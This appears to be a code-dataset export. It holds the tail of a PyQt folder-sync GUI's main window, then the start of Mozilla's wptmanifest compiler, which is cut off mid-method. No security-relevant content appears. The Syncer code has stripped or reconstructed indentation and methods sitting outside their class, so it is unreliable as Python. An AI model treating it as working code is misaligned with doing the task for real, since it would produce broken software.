amount = SIZE_COPIED[0] + cp_amt
speed = (amount - prev) * 2
prev = amount
VAL[0] = (amount / TOT_CP_AMT[0]) * 100
PRE_TIME[0] = PRE_TIME[0] + 0.5
mins = PRE_TIME[0] / 60
secs = PRE_TIME[0] % 60
avg = avg + speed
avg_speed = avg / i
if(i % 5 == 0):
self.sig.dock1.emit()
TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], amount, TOT_CP_AMT[0], mins, secs, avg_speed))
try:
TEXT3[0] = "Copying: '%s'(%d/%d)MB %d%%\t\t\tSpeed: %dMBPS" %(CURR_NAME[0], cp_amt, CURR_SIZE[0], (cp_amt / (CURR_SIZE[0]) * 100), speed)
except:
TEXT3[0] = "Copying: '%s'(%d/%d)MB %d%%\t\t\tSpeed: %dMBPS" %(CURR_NAME[0], cp_amt, CURR_SIZE[0], 100, speed)
self.sig.prog_bar.emit()
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
time.sleep(0.5)
i = i + 1
#If Delete action is going on
if(ACTION[0] == "del1" or ACTION[0] == "del2"):
while True:
if(ACTION[0] == " "): #If delete action completed but progress is not fully updated due to time lag among two threads
if(DEL_FILE[0] == TOT_DEL_FILE[0]):
TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], SIZE_COPIED[0], TOT_CP_AMT[0], mins, secs, AVG_SPEED[0]))
TEXT3[0] = "Deleting: '%s'(%d)MB\t\tDeleted: %d/%d\t\tFreed: %d/%d(MB)" %(CURR_NAME[0], CURR_SIZE[0], TOT_DEL_FILE[0], TOT_DEL_FILE[0], TOT_DEL_AMT[0], TOT_DEL_AMT[0])
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
return
PRE_TIME[0] = PRE_TIME[0] + 0.25
mins = PRE_TIME[0] / 60
secs = PRE_TIME[0] % 60
TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], SIZE_COPIED[0], TOT_CP_AMT[0], mins, secs, AVG_SPEED[0]))
TEXT3[0] = "Deleting: '%s'(%d)MB\t\tDeleted: %d/%d\t\tFreed: %d/%d(MB)" %(CURR_NAME[0], CURR_SIZE[0], DEL_FILE[0], TOT_DEL_FILE[0], SIZE_DEL[0], TOT_DEL_AMT[0])
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
time.sleep(0.25)
"""
BOX_TEXT is a pipe to which texts are pushed
and this function flush them to Text Browser
"""
def update_text1(self):
self.text_box.append("<font size = 3>" + BOX_TEXT[0] + "</font>")
BOX_TEXT.remove(BOX_TEXT[0])
self.text_box.moveCursor(QTextCursor.End)
"""
Handler for progress label signal
"""
def update_proglab(self):
self.progress_text.setText(TEXT2[0])
"""
Handler for Progress Bar Signal
"""
def update_progbar(self):
self.pbar.setValue(VAL[0])
"""
Handler for Status Bar Signal
"""
def update_statbar(self):
central.status.showMessage(TEXT3[0])
"""
Log Window
"""
def log(self):
view_log = log_window()
view_log.setWindowTitle("Log File")
view_log.resize(900, 650)
pal = QPalette()
pal.setColor(QPalette.Background, Qt.white)
view_log.setPalette(pal)
view_log.exec_()
"""
Map dock2 file object and dock3 file object
"""
def make_mapping(self, action):
if(action == "copy"):
right_list = right_cp_obj
left_obj_map = cp_map
left_list = left_cp_obj
left_map = left_cp_flist
right_map = right_cp_flist
if(action == "del"):
right_list = right_del_obj
left_obj_map = del_map
left_list = left_del_obj
left_map = left_del_flist
right_map = right_del_flist
#right_map.clear()
#left_map.clear()
clear_list([right_map, left_map])
#Keeping only file object for dock3
i = 0
size = len(right_list)
while(i < size):
if(right_list[i][2] == 0):
right_map.append(right_list[i][0])
i = i + 1
#Keeping only file objects for dock2
tot_files = len(right_map)
for i in range(tot_files):
left_map.append(" ")
out_len = len(left_obj_map)
outer = 0
while(outer < out_len):
in_len = len(left_obj_map[outer])
inner = 1
while(inner < in_len):
ind = left_obj_map[outer][inner]
ele = left_list[outer][inner]
left_map[ind] = ele
inner = inner + 1
outer = outer + 1
#The Fetch Function
def on_fetch(self, fetch_list):
    """
    Initialize environment variables for progress updates
    """
    # For every source/target pair in fetch_list: build temporary path
    # lists, diff source vs target (make_list / onfetch helpers in the
    # sync module) to find dirs/files to copy plus collisions, append the
    # results to the module-level lists, clear the temporaries, then run
    # the same process again to build the delete lists.
    TOT_DEL_FILE[0] = 0
    TOT_DEL_AMT[0] = 0
    TOT_CP_FILE[0] = 0
    TOT_CP_AMT[0] = 0
    for item in fetch_list:
        tar_name = item['target']
        source_name = item['source']
        #Temporary List for storing file paths and directory paths
        tmp_tcp_dir = []
        tmp_tcp_file = []
        tmp_scp_dir = []
        tmp_scp_file = []
        tmp_cp_file_from = []
        tmp_cp_dir_from = []
        tmp_file2cp = []
        tmp_dir2cp = []
        tmp_file2del = []
        tmp_dir2del = []
        tmp_col_src = []
        tmp_col_tar = []
        empty = []
        #Above temporary lists which are required to be cleared before next making list operation
        tmp_list_name = [empty, tmp_col_src, tmp_col_tar, tmp_tcp_dir, tmp_tcp_file, tmp_scp_dir, tmp_scp_file, tmp_cp_file_from, tmp_cp_dir_from, tmp_file2cp, tmp_dir2cp, tmp_file2del, tmp_dir2del]
        """
        Making File List For COPYING operation
        Function in sync file
        """
        make_list(self, item, tmp_tcp_dir, tmp_tcp_file, tmp_scp_dir, tmp_scp_file, tmp_cp_file_from, tmp_cp_dir_from, "copy")
        #Find Directories to be copied
        onfetch(self, tmp_scp_dir, tmp_tcp_dir, tmp_dir2cp, tmp_cp_dir_from, empty, "copy")
        s = len(tmp_dir2cp)
        i = 0
        while(i < s):
            # Rebase the relative path (leading char stripped) onto the target.
            dir2cp.append(tar_name + tmp_dir2cp[i][1:]) #Append to main lists
            i = i + 1
        #Find Files to be copied
        onfetch(self, tmp_scp_file, tmp_tcp_file, tmp_file2cp, tmp_cp_file_from, tmp_col_src, "copy")
        s = len(tmp_cp_file_from)
        i = 0
        while(i < s):
            file2cp.append(tar_name + tmp_file2cp[i][1:]) #Append to main list
            cp_file_from.append(tmp_cp_file_from[i]) #Append to main list
            i = i + 1
        i = 0
        col_len = len(tmp_col_src)
        while(i < col_len):
            col_cp_src.append(tmp_col_src[i]) #Append Collision File To Main List
            i = i + 1
        i = 0
        while(i < len(tmp_list_name)):
            #tmp_list_name[i].clear() #Clear temporary lists to make delete list
            clear_list([tmp_list_name[i]]);
            i = i + 1
        #Store sizes in env_progress variables
        TOT_CP_FILE[0] = TOT_CP_FILE[0] + s
        """
        Make list of file paths and directory pathsfor delete operation
        """
        make_list(self, item, tmp_tcp_dir, tmp_tcp_file, tmp_scp_dir, tmp_scp_file, tmp_cp_file_from, tmp_cp_dir_from, "del")
        #Find Directories to be deleted
        onfetch(self, tmp_scp_dir, tmp_tcp_dir, tmp_dir2del, tmp_cp_dir_from, empty, "del")
        s = len(tmp_cp_dir_from)
        i = 0
        while(i < s):
            del_dir_from.append(tmp_cp_dir_from[i]) #Append to main list
            i = i + 1
        #Find Files to be deleted
        onfetch(self, tmp_scp_file, tmp_tcp_file, tmp_file2del, tmp_cp_file_from, empty, "del")
        s = len(tmp_cp_file_from)
        i = 0
        while(i < s):
            del_file_from.append(tmp_cp_file_from[i]) #Append to main list
            i = i + 1
        TOT_DEL_FILE[0] = TOT_DEL_FILE[0] + s
class central(QMainWindow):
    # Main application window: menu bar, status bar, right dock (dock3)
    # and the `centre` widget as the central area.
    def __init__(self):
        super(central, self).__init__()
        """
        Start handling dock3 treewidget signal
        -1: TreeWidget not Created
        0: Creating TreeWidget, No Signal Processed
        2: TreeWidget Created, Signal will be processed
        """
        # start_handle2 gates right_tick_handle(): itemChanged signals are
        # only acted on once update_right_dock() has finished (== 2).
        central.start_handle2 = -1
        self.init_menubar()
        self.init_statusbar()
        self.dock()
        self.def_central() #Set Centre Widgets
def make_connection(self, text, icon = None, shortcut = None, statustip = "", check = False, connect = None):
    # Factory for a configured QAction owned by this window: optional
    # icon, shortcut, status/tool tip, checkability and triggered-slot.
    action = QAction(text, self)
    if (icon is not None):
        action.setIcon(QIcon(icon))
    if (shortcut is not None):
        action.setShortcut(shortcut)
    if (statustip is not None):
        # Tool tip mirrors the status tip so hover text matches the bar.
        action.setStatusTip(statustip)
        action.setToolTip(statustip)
    if (check):
        action.setCheckable(True)
    if (connect is not None):
        action.triggered.connect(connect)
    return action
def init_menubar(self):
    # Build the Reset and Help menus from make_connection() QActions.
    menubar = self.menuBar()
    reset = menubar.addMenu("&Reset")
    reload = self.make_connection("Delete Locations", "icon.png", "ctrl+d", "Reset Locations", False, self.reset_loc)
    del_log = self.make_connection("Delete Logs", "icon.png", "ctrl+h", "Delete History", False, self.reset_history)
    self.add_submenu(reset, (reload, del_log))
    helpme = menubar.addMenu("&Help")
    about = self.make_connection("About", "icon.png", "ctrl+a", "About", False, self.about)
    sync_help = self.make_connection("Help", "icon.png", "ctrl+h", "View Help", False, self.help)
    visit = self.make_connection("Visit Web", "icon.png", "ctrl+v", "Visit Web", False, self.visit)
    self.add_submenu(helpme, (about, sync_help, visit))
def init_statusbar(self):
    # Create the status bar, shared class-wide as central.status.
    central.status = self.statusBar()
    set_style(central.status, "status_bar")
def dock(self):
    """Build dock3 (the right dock): two checkable trees -- files to be
    copied (central.tree) and files to be deleted (central.del_tree) --
    inside a tab widget."""
    self.log_dock = QDockWidget()
    self.log_dock.setMinimumWidth(300)
    self.log_dock.setFeatures(QDockWidget.NoDockWidgetFeatures)
    self.log_dock.setObjectName("Log Dock")
    self.log_dock.setAllowedAreas(Qt.RightDockWidgetArea)
    self.addDockWidget(Qt.RightDockWidgetArea, self.log_dock)
    set_style(self.log_dock, "log_dock")
    central.tree = QTreeWidget()
    central.tree.setFocusPolicy(Qt.NoFocus)
    set_style(central.tree, "tree")
    self.tree.setHeaderLabels(["Files To Be Copied"])
    self.tree.setHeaderHidden(True)
    self.tree.setColumnCount(1)
    central.tree.itemChanged.connect(lambda ob = self : self.right_tick_handle(ob, "copy"))
    central.del_tree = QTreeWidget()
    central.del_tree.setFocusPolicy(Qt.NoFocus)
    set_style(central.del_tree, "tree")
    # BUG FIX: this header was previously set on self.tree, clobbering the
    # copy tree's "Files To Be Copied" label; it belongs to the delete tree.
    self.del_tree.setHeaderLabels(["Files To Be Deleted"])
    self.del_tree.setHeaderHidden(True)
    central.del_tree.itemChanged.connect(lambda ob = self : self.right_tick_handle(ob, "del"))
    tab = QTabWidget()
    tab.setFocusPolicy(Qt.NoFocus)
    tab1 = QWidget()
    tab2 = QWidget()
    set_style(tab, "tab")
    tab.addTab(tab1, "Files 2 Copy")
    tab.addTab(tab2, "Files 2 Delete")
    set_style(tab, "right_tab")
    self.log_dock.setWidget(tab)
    cp_grid = QGridLayout()
    del_grid = QGridLayout()
    cp_grid.addWidget(self.tree, 0, 0)
    del_grid.addWidget(self.del_tree, 0, 0)
    tab1.setLayout(cp_grid)
    tab2.setLayout(del_grid)
#Add submenu to Menu
def add_submenu(self, menu, submenu):
    # Append each entry to `menu`: a None entry inserts a separator, any
    # truthy entry is added as an action.
    for entry in submenu:
        if entry is None:
            menu.addSeparator()
        elif entry:
            menu.addAction(entry)
#Delete Location Dictionaries and all settings related to them
def reset_loc(self):
    # List the pickled settings files, confirm with the user, then delete
    # them from the application directory (ignoring missing files).
    #Pickled Files
    files = ['all_list.p', 'list_name.p', 'top_check.p', 'left_check.p']
    msg = "This Action Results\n"
    for item in files:
        msg = msg + "Delete '" + str(item) + "'\n"
    reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
    if(reply == QMessageBox.No):
        return
    os.chdir(curr)
    for item in files:
        try:
            os.remove(item)
        except:
            pass
#Delete All Log Files
def reset_history(self):
    # Confirm with the user, then delete every file in the log directory.
    files = []
    #Find Log Files
    os.chdir(log_dir)
    for item in os.listdir('.'):
        files.append(item)
    msg = "This Action Results\n"
    for item in files:
        msg = msg + "Delete '" + str(item) + "'\n"
    #Confirm Action
    reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
    if(reply == QMessageBox.No):
        return
    for item in files:
        try:
            os.remove(item) #Delete Files
        except:
            pass
    os.chdir(curr)
#Handler For About Menu
def about(self):
    # Show the modal about box with the canned about_text.
    QMessageBox.about(self, "About Us", about_text)
#Handler for Help Menu
def help(self):
    # Open the online help page in the default browser.
    webbrowser.open_new(help_link)
#Handler for visit menu
def visit(self):
    # Open the project website in the default browser.
    webbrowser.open_new(visit_link)
#Set Centre Widget for Main Window
def def_central(self):
    # Install the `centre` widget as this QMainWindow's central widget.
    centre_widget = centre()
    #self.central_frame.setWidget(centre_widget)
    self.setCentralWidget(centre_widget)
"""
Lock or Unlock Dock3 when File Actions going on
"""
def lock_right(self, action):
    # Disable or re-enable both dock3 trees while a file action runs.
    if(action == "lock"):
        central.tree.setDisabled(True)
        central.del_tree.setDisabled(True)
    if(action == "unlock"):
        central.tree.setEnabled(True)
        central.del_tree.setEnabled(True)
def update_right_dock(self, file_list, action):
    # Rebuild one dock3 tree from a sorted list of absolute file paths.
    # Each path is split on '/'; `level` tracks the QTreeWidgetItem at each
    # depth and `level_name` the previous path components, so consecutive
    # paths reuse the already-created ancestors.  obj_list records
    # [item, depth, is_dir] triples in visit order and is copied into
    # right_cp_obj / right_del_obj at the end.  start_handle2 suppresses
    # itemChanged handling while the tree is being (re)built.
    # NOTE(review): indentation below was reconstructed from a
    # whitespace-stripped source -- in particular the placement of the
    # trailing `level_counter` adjustments should be verified.
    central.start_handle2 = 0
    if(action == "del"):
        tree = central.del_tree
        #right_del_obj.clear()
        #right_del_obj = []
        clear_list([right_del_obj]);
    if(action == "copy"):
        tree = central.tree
        #right_cp_obj.clear()
        #right_cp_obj = []
        clear_list([right_cp_obj]);
    obj_list = []
    maps = []  # NOTE(review): never used below
    level = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] #Stores Maximum and Current Levels For The TreeWidget
    level_name = ["", "", "", "", "", "", "", "", "", "", "", "", "", ""] #Stores Previous File Path To Compare before adding file or folder to tree
    tree.clear()
    prev = ""
    tot_len = 2
    p = 0
    for file in file_list:
        if(os.path.isdir(file)):
            is_file = 0
        else:
            is_file = 1
        tmp_map = []
        file = file[1:]
        abs_path = file.split('/')
        abs_path_len = len(abs_path)
        filename = abs_path[-1]
        # Case 1: same parent directory as the previous path.
        if(prev == file[:tot_len - 1]):
            #print("LOOOOOOOOOOOOP ------ 1")
            while (i < abs_path_len - 1):
                level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
                tmp_map.append(level[level_counter + 1])
                tmp_map.append(level_counter + 1)
                tmp_map.append(1)
                obj_list.append(tmp_map)
                tmp_map = []
                level[level_counter + 1].setCheckState(0, Qt.Checked)
                tree.expandItem(level[level_counter + 1])
                level_counter = level_counter + 1
                level_name[i] = abs_path[i]
                i = i + 1
            level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
            tmp_map.append(level[level_counter + 1])
            tmp_map.append(level_counter + 1)
            tmp_map.append(0)
            obj_list.append(tmp_map)
            tmp_map = []
            level[level_counter + 1].setCheckState(0, Qt.Checked)
            tree.expandItem(level[level_counter + 1])
            file_len = len(filename)
            tot_len = len(file) - file_len
            prev = file[:tot_len - 1]
            continue
        # Find the length of the prefix shared with the previous path.
        len2 = len(level_name)
        k = 0
        while k < abs_path_len and k < len2:
            if (level_name[k] == abs_path[k]):
                k = k + 1
                continue
            break
        level_counter = k + 1
        i = level_counter - 1
        while k < abs_path_len:
            level_name[k] = abs_path[k]
            k = k + 1
        # Case 2: shares a non-empty prefix with the previous path.
        if level_counter > 1:
            #print("LOOOOOOOOOOOOP ------ 2")
            if(i == abs_path_len - 1):
                level_counter = level_counter - 1
            while i < abs_path_len - 1:
                level[level_counter] = QTreeWidgetItem(level[level_counter - 1], [abs_path[i]])
                tmp_map.append(level[level_counter])
                tmp_map.append(level_counter)
                tmp_map.append(1)
                obj_list.append(tmp_map)
                tmp_map = []
                level[level_counter].setCheckState(0, Qt.Checked)
                tree.expandItem(level[level_counter])
                level_counter = level_counter + 1
                level_name[i] = abs_path[i]
                i = i + 1
                if i == abs_path_len - 1:
                    level_counter = level_counter - 1
            level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
            tmp_map.append(level[level_counter + 1])
            tmp_map.append(level_counter + 1)
            tmp_map.append(0)
            obj_list.append(tmp_map)
            tmp_map = []
            level[level_counter + 1].setCheckState(0, Qt.Checked)
            tree.expandItem(level[level_counter + 1])
            file_len = len(filename)
            tot_len = len(file) - file_len
            prev = file[:tot_len - 1]
            continue
        # Case 3a: single-component path -- a file at the tree root.
        if(abs_path_len == 1):
            level[level_counter + 1] = QTreeWidgetItem(tree, [abs_path[i]])
            tmp_map.append(level[level_counter + 1])
            tmp_map.append(level_counter + 1)
            tmp_map.append(0)
            obj_list.append(tmp_map)
            tmp_map = []
            level[level_counter + 1].setCheckState(0, Qt.Checked)
            tree.expandItem(level[level_counter + 1])
            continue
        # Case 3b: no shared prefix -- start a new top-level branch.
        i = 1
        #print("LOOOOOOOOOOOOP ------ 3")
        level[level_counter] = QTreeWidgetItem(tree, [abs_path[0]])
        tmp_map.append(level[level_counter])
        tmp_map.append(level_counter)
        tmp_map.append(1)
        obj_list.append(tmp_map)
        tmp_map = []
        level[level_counter].setCheckState(0, Qt.Checked)
        tree.expandItem(level[level_counter])
        level_name[level_counter - 1] = abs_path[0]
        while i < abs_path_len - 1:
            level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
            tmp_map.append(level[level_counter + 1])
            tmp_map.append(level_counter + 1)
            tmp_map.append(1)
            obj_list.append(tmp_map)
            tmp_map = []
            level[level_counter + 1].setCheckState(0, Qt.Checked)
            tree.expandItem(level[level_counter + 1])
            level_counter = level_counter + 1
            level_name[i] = abs_path[i]
            if i == abs_path_len - 1:
                level_counter = level_counter - 1
            i = i + 1
        level[level_counter + 1] = QTreeWidgetItem(level[level_counter], [abs_path[i]])
        tmp_map.append(level[level_counter + 1])
        tmp_map.append(level_counter + 1)
        tmp_map.append(0)
        obj_list.append(tmp_map)
        tmp_map = []
        level[level_counter + 1].setCheckState(0, Qt.Checked)
        tree.expandItem(level[level_counter + 1])
        level_name[i] = abs_path[i]
        file_len = len(filename)
        tot_len = len(file) - file_len
        prev = file[:tot_len - 1]
        p = p + 1
    if(action == "copy"):
        for item in obj_list:
            right_cp_obj.append(item)
    if(action == "del"):
        for item in obj_list:
            right_del_obj.append(item)
    central.start_handle2 = 2
#Handler for Dock3 TreeWidgets
def right_tick_handle(self, ob, action):
    # Dock3 check-box handler: propagate a tick down to all descendants
    # and up through ancestor folders, then mirror file-level changes back
    # into dock2 via handle_left().  obj_list holds [item, depth, is_dir]
    # triples in tree (pre-order) order; an item's descendants are the
    # following entries with a strictly greater depth.
    # NOTE(review): indentation below was reconstructed from a
    # whitespace-stripped source -- verify nesting against the original.
    if(central.start_handle2 == 2):
        if(action == "copy"):
            tree = central.tree
            obj_list = right_cp_obj
        if(action == "del"):
            tree = central.del_tree
            obj_list = right_del_obj
        tree.blockSignals(True)
        pointer = 0
        list_len = len(obj_list)
        # Locate the toggled item in obj_list.
        while(pointer < list_len):
            if(ob == obj_list[pointer][0]):
                break
            pointer = pointer + 1
        #It Is Folder
        if(obj_list[pointer][2] == 1):
            if(obj_list[pointer][0].checkState(0) == Qt.Checked):
                # Check every descendant, mirroring files to dock2.
                i = pointer + 1
                while(i < list_len and obj_list[i][1] > obj_list[pointer][1]):
                    obj_list[i][0].setCheckState(0, Qt.Checked)
                    if(obj_list[i][2] == 0):
                        self.handle_left(obj_list[i][0], action)
                    i = i + 1
                # Walk back up, checking each ancestor folder.
                i = pointer - 1
                level = obj_list[pointer][1]
                while(i >= 0):
                    if(obj_list[i][1] < level and obj_list[i][2] == 1):
                        obj_list[i][0].setCheckState(0, Qt.Checked)
                        level = obj_list[i][1]
                    i = i - 1
            if(obj_list[pointer][0].checkState(0) == Qt.Unchecked):
                # Uncheck every descendant, mirroring files to dock2.
                i = pointer + 1
                while(i < list_len and obj_list[i][1] > obj_list[pointer][1]):
                    obj_list[i][0].setCheckState(0, Qt.Unchecked)
                    if(obj_list[i][2] == 0):
                        self.handle_left(obj_list[i][0], action)
                    i = i + 1
                # Walk up: uncheck each ancestor whose subtree has no
                # checked entries left (scan siblings fore and aft).
                i = pointer - 1
                while(i >= 0):
                    flag = 0
                    i = pointer + 1
                    while(i < list_len and obj_list[i][1] >= obj_list[pointer][1]):
                        if(obj_list[i][0].checkState(0) == Qt.Checked):
                            flag = 1
                            break
                        i = i + 1
                    i = pointer - 1
                    while(i >= 0 and obj_list[i][1] >= obj_list[pointer][1]):
                        if(obj_list[i][0].checkState(0) == Qt.Checked):
                            flag = 1
                            break
                        i = i - 1
                    if(not flag):
                        if(i >= 0):
                            obj_list[i][0].setCheckState(0, Qt.Unchecked)
                            pointer = i
                            continue
                    if(flag):
                        break
        #It Is File
        if(obj_list[pointer][2] == 0):
            if(obj_list[pointer][0].checkState(0) == Qt.Checked):
                # Check every ancestor folder.
                i = pointer - 1
                level = obj_list[pointer][1]
                while(i >= 0):
                    if(obj_list[i][1] < level and obj_list[i][2] == 1):
                        obj_list[i][0].setCheckState(0, Qt.Checked)
                        level = obj_list[i][1]
                    i = i - 1
            if(obj_list[pointer][0].checkState(0) == Qt.Unchecked):
                # Uncheck ancestors whose subtrees have no checked entries.
                i = pointer - 1
                while(i >= 0):
                    flag = 0
                    i = pointer + 1
                    while(i < list_len and obj_list[i][1] >= obj_list[pointer][1]):
                        if(obj_list[i][0].checkState(0) == Qt.Checked):
                            flag = 1
                            break
                        i = i + 1
                    i = pointer - 1
                    while(i >= 0 and obj_list[i][1] >= obj_list[pointer][1]):
                        if(obj_list[i][0].checkState(0) == Qt.Checked):
                            flag = 1
                            break
                        i = i - 1
                    if(not flag):
                        if(i >= 0):
                            obj_list[i][0].setCheckState(0, Qt.Unchecked)
                            pointer = i
                            continue
                    if(flag):
                        break
            self.handle_left(ob, action)
        tree.blockSignals(False)
#Reflect change to Tree in Dock2
    def handle_left(self, ob, action):
        """Mirror the check state of item *ob* from the right-hand tree onto
        the corresponding item in the left-hand tree.

        ob     -- QTreeWidgetItem whose state changed in the right tree
        action -- "copy" selects the copy file lists, "del" the delete lists
        """
        #left_*/right_* flists are module-level parallel lists: index i in
        #the right list corresponds to index i in the left list
        if(action == "copy"):
            left = left_cp_flist
            right = right_cp_flist
        if(action == "del"):
            left = left_del_flist
            right = right_del_flist
        i = 0
        size = len(right)
        while(i < size):
            if(right[i] == ob): #Find Index of object
                break
            i = i + 1
        #NOTE(review): if ob is not in the list, i == size here and the
        #lookups below raise IndexError -- presumably callers guarantee
        #membership; confirm
        if(right[i].checkState(0) == Qt.Checked):
            left[i].setCheckState(0, Qt.Checked)
        if(right[i].checkState(0) == Qt.Unchecked):
            left[i].setCheckState(0, Qt.Unchecked)
| AsitRout/Syncer | main_window.py | Python | gpl-2.0 | 63,804 | [
"VisIt"
] | 9629c8f5bf01a3797ca160869d1e322e1cd764e1efe1ff8810dd4d388e3846fd |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import operator
from ..node import NodeVisitor, DataNode, ConditionalNode, KeyValueNode, ListNode, ValueNode
from ..parser import parse
class ConditionalValue(object):
    """Wraps a value node (or a conditional node holding one) together with a
    compiled condition function that can be evaluated against a run_info dict."""

    def __init__(self, node, condition_func):
        self.node = node
        self.condition_func = condition_func
        if isinstance(node, ConditionalNode):
            #a ConditionalNode has exactly [condition, value] as children
            assert len(node.children) == 2
            self.condition_node = self.node.children[0]
            self.value_node = self.node.children[1]
        else:
            #unconditional value: no condition node; the node itself holds the value
            assert isinstance(node, (ValueNode, ListNode))
            self.condition_node = None
            self.value_node = self.node

    @property
    def value(self):
        #scalar nodes expose their data directly; list nodes expose a list of
        #their children's data
        if isinstance(self.value_node, ValueNode):
            return self.value_node.data
        else:
            return [item.data for item in self.value_node.children]

    @value.setter
    def value(self, value):
        self.value_node.data = value

    def __call__(self, run_info):
        """Return truthy when this value applies under run_info."""
        return self.condition_func(run_info)

    def set_value(self, value):
        self.value = value

    def remove(self):
        #when this is the parent's only child, remove the parent
        #(the enclosing KeyValueNode) as well, then detach this node
        if len(self.node.parent.children) == 1:
            self.node.parent.remove()
        self.node.remove()
class Compiler(NodeVisitor):
    """Visitor that compiles a raw wptmanifest AST into a tree of output
    items (ManifestItem by default) whose key values are ConditionalValue
    objects evaluable at runtime.

    The visitor maintains self.output_node as the item currently being
    built; visit order therefore matters.
    """

    def compile(self, tree, data_cls_getter=None, **kwargs):
        """Compile a raw AST into a form where conditional expressions
        are represented by ConditionalValue objects that can be evaluated
        at runtime.

        tree - The root node of the wptmanifest AST to compile

        data_cls_getter - A function taking two parameters; the previous
                          output node and the current ast node and returning
                          the class of the output node to use for the current
                          ast node
        """
        if data_cls_getter is None:
            self.data_cls_getter = lambda x, y: ManifestItem
        else:
            self.data_cls_getter = data_cls_getter

        self.tree = tree
        self.output_node = self._initial_output_node(tree, **kwargs)
        self.visit(tree)
        assert self.output_node is not None
        return self.output_node

    def compile_condition(self, condition):
        """Compile a ConditionalNode into a ConditionalValue.

        condition: A ConditionalNode"""
        #wrap the condition in a minimal DataNode/KeyValueNode tree so the
        #normal compile path can process it, then pull the single value out
        data_node = DataNode()
        key_value_node = KeyValueNode()
        key_value_node.append(condition.copy())
        data_node.append(key_value_node)
        manifest_item = self.compile(data_node)
        return manifest_item._data[None][0]

    def _initial_output_node(self, node, **kwargs):
        #root output item; previous node is None by definition
        return self.data_cls_getter(None, None)(node, **kwargs)

    def visit_DataNode(self, node):
        if node != self.tree:
            output_parent = self.output_node
            self.output_node = self.data_cls_getter(self.output_node, node)(node)
        else:
            output_parent = None

        assert self.output_node is not None

        for child in node.children:
            self.visit(child)

        if output_parent is not None:
            # Append to the parent *after* processing all the node data
            output_parent.append(self.output_node)
            self.output_node = self.output_node.parent

        assert self.output_node is not None

    def visit_KeyValueNode(self, node):
        key_values = []
        for child in node.children:
            #visit returns (condition_func, value); only the condition is
            #kept here -- the value is read back through the child node
            condition, value = self.visit(child)
            key_values.append(ConditionalValue(child, condition))

        self.output_node._add_key_value(node, key_values)

    def visit_ListNode(self, node):
        #lists are unconditional; the condition always matches
        return (lambda x:True, [self.visit(child) for child in node.children])

    def visit_ValueNode(self, node):
        return (lambda x: True, node.data)

    def visit_ConditionalNode(self, node):
        #children are [condition expression, value]
        return self.visit(node.children[0]), self.visit(node.children[1])

    def visit_StringNode(self, node):
        #children are index expressions applied to the literal string
        indexes = [self.visit(child) for child in node.children]

        def value(x):
            rv = node.data
            for index in indexes:
                rv = rv[index(x)]
            return rv
        return value

    def visit_NumberNode(self, node):
        #a "." selects float semantics, otherwise int
        if "." in node.data:
            return lambda x: float(node.data)
        else:
            return lambda x: int(node.data)

    def visit_VariableNode(self, node):
        #variable lookup in run_info, followed by optional index expressions
        indexes = [self.visit(child) for child in node.children]

        def value(x):
            data = x[node.data]
            for index in indexes:
                data = data[index(x)]
            return data
        return value

    def visit_IndexNode(self, node):
        assert len(node.children) == 1
        return self.visit(node.children[0])

    def visit_UnaryExpressionNode(self, node):
        #NOTE: the local name 'operator' shadows the operator module inside
        #this function; the module is not needed here
        assert len(node.children) == 2
        operator = self.visit(node.children[0])
        operand = self.visit(node.children[1])

        return lambda x: operator(operand(x))

    def visit_BinaryExpressionNode(self, node):
        assert len(node.children) == 3
        operator = self.visit(node.children[0])
        operand_0 = self.visit(node.children[1])
        operand_1 = self.visit(node.children[2])

        assert operand_0 is not None
        assert operand_1 is not None

        return lambda x: operator(operand_0(x), operand_1(x))

    def visit_UnaryOperatorNode(self, node):
        return {"not": operator.not_}[node.data]

    def visit_BinaryOperatorNode(self, node):
        #operator.and_/or_ are the bitwise &/|; for bool operands (the only
        #operands produced by conditions) they match logical and/or, but
        #both sides are always evaluated (no short-circuit)
        return {"and": operator.and_,
                "or": operator.or_,
                "==": operator.eq,
                "!=": operator.ne}[node.data]
class ManifestItem(object):
    """Compiled output node corresponding to a DataNode of the source AST.

    Key/value data is stored as lists of ConditionalValue objects; lookups
    consult this node first and then the root node, so root-level keys act
    as defaults for the whole tree.
    """
    def __init__(self, node=None, **kwargs):
        self.node = node      #the source DataNode this item was compiled from
        self.parent = None
        self.children = []
        self._data = {}       #key -> [ConditionalValue, ...]

    def __repr__(self):
        return "<ManifestItem %s>" % (self.node.data)

    def __str__(self):
        rv = [repr(self)]
        for item in self.children:
            rv.extend(" %s" % line for line in str(item).split("\n"))
        return "\n".join(rv)

    @property
    def is_empty(self):
        #empty when this node has no data and every descendant is empty
        if self._data:
            return False
        return all(child.is_empty for child in self.children)

    @property
    def root(self):
        node = self
        while node.parent is not None:
            node = node.parent
        return node

    @property
    def name(self):
        return self.node.data

    def has_key(self, key):
        for node in [self, self.root]:
            if key in node._data:
                return True
        return False

    def get(self, key, run_info=None):
        """Return the value for key whose condition matches run_info,
        checking this node then the root; raises KeyError when none match."""
        if run_info is None:
            run_info = {}

        for node in [self, self.root]:
            if key in node._data:
                for cond_value in node._data[key]:
                    try:
                        matches = cond_value(run_info)
                    except KeyError:
                        #a condition referencing a property missing from
